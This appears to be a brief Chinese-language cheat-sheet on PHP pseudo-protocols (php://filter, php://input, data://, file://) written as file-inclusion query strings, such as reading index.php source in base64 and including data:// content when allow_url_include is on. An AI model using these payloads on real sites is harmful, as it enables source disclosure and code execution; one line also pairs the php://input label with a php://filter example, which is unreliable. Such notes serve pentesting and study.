PHP伪协议

php>=5.2
php://filter协议 ?file=file://D:/soft/phpStudy/WWW/phpcode.txt
php://input协议 ?file=php://filter/read=convert.base64-encode/resource=./index.php
data://协议
data://协议允许读入
要求:打开allow_url_fopen allow_url_include
?file=data://text/plain,
?file=data://text/plain;base64,编码

file协议:
file:///文件路径